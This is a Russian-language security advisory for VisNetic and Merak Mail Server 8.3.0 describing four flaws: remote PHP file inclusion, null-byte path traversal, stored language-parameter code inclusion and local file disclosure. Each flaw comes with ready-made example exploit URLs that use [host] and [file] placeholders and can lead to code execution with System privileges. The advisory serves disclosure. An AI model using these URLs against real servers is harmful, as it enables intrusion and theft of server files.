ПО: VisNetic Mail Server и Merak Mail Server
Версия: 8.3.0 build 1
Описание:
Уязвимость позволяет использовать любым пользователям для получения
информации и работы с уязвимой системой.
1) Webmail и webadmin услуги, выполнение из PHP и работающие с
включенным "register_global". "language" and "lang_settings" переменный
в "/accounts/inc/include.php" и "/admin/inc/include.php" не должным
образом инициализируются, когда к сценариям обращаются непосредственно.
Что дает возможность перезаписать переменные и вызвать сценарии с
произвольным PHP кодом из локальных и удаленных источников.
Например:
http://[host]:32000/accounts/inc/include.php?
language=0&lang_settings[0][1]=http://[host]/
http://[host]:32000/admin/inc/include.php?
language=0&lang_settings[0][1]=http://[host]/
Успешное использование уязвимости позволяет выполнить произвольный PHP
код с привилегиями System.
2) Ввод параметра "lang" в "/dir/include.html" не должным образом
проверяется перед использованием. Это может быть использованным для
работы с произвольными файлами.
Пример:
http://[host]:32000/dir/include.html?lang=[file]%00
Успешное использование позволяет работать с любыми файлами на сервере.
3) Ввод параметр "language" в "/mail/settings.html" не проверяется при
обращении к базе данных. Это может использоваться совместно с
"lang_settings" для работы с произвольны PHP кодом из локального и
удаленного источника.
Пример:
http://[host]:32000/mail/settings.html?
id=[current_id]&Save_x=1&language=TEST
http://[host]:32000/mail/index.html?
id=[current_id]&lang_settings[TEST]=test;http://[host]/;
4) Переменные "Default_layout" и "layout_settings"не проверяються, когда
"/mail/include.html" начинает работать с HTTP_USER_AGENT. Это можно
использовать для просмотра содержания локальных файлов.
Пример (использовать не-IE/Mozilla/Firefox браузер):
http://[host]:32000/mail/index.html?/mail/index.html?
default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2